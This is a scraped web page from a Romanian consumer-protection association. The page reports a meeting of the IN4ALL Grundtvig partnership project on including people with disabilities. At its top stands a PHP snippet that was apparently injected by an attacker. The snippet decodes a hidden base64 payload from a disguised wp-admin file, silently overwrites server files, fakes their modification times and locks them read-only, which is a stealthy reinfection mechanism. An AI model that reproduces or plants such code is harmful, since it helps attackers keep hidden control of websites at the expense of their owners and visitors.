$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: A doua intalnire de lucru, din cadrul “IN4ALL” Project – Grundtving Partnership – Lifelong Learning Program – O noua atitudine

In cadrul Conferintei, reprezentantii asociatiilor de consumatori  partenere din strainatate au prezentat organizatiile din care provin, activitatile desfasurate in cadrul proiectului pe plan national, circumstantele existente in fiecare tara cu privire la incluziunea persoanelor cu dizabilitati, precum si problemele pe care acestea le intampina.

A.N.P.C.P.P.S.Romania te indeamna sa fii un consumator educat si informat si mai ales sa iti pese de cei din jurul tau. Sa adoptam „o9atitudine”!

 A.N.P.C.P.P.S. Romania- asociatie de consumatori, avand Secretariatul General in Bucuresti, Str. Muzelor, nr. 1, Sector 4, Cod Postal 040191, Romania, e-mail: secretariat.general@protectia-consumatorilor.ro, web: www.protectia-consumatorilor.roeste o organizatie reprezentativa, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor, unica organizatie din Romania, membra cu drepturi depline in Consumers International – Organizatia Mondiala a Organizatiilor de Consumatori.

By o9admin